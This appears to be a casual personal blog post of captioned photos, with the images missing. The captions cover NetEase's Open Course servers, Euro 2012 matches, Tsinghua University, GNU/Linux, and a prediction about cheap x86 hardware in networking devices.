
I like NetEase. Because they provided servers for Open Course and TED.

 

EURO CUP 2012. When England vs. France began, a French guy sang the national anthem:

 

AMD and Intel are so "close"... WTH
 
Don't look at that girl. Keep your eyes on the GNU logo, please...


TsingHua University. This is the only place I like.
 

I bet the combination of cheap x86 hardware and GNU/Linux will beat the other platforms in the networking device field. An Atom 4/5xx 1.8 GHz dual-core machine only costs about 1,400 RMB:


We went out to bar to watch German VS Greece:
 

Remember that monkey-coder's story?


By the community, and for the community!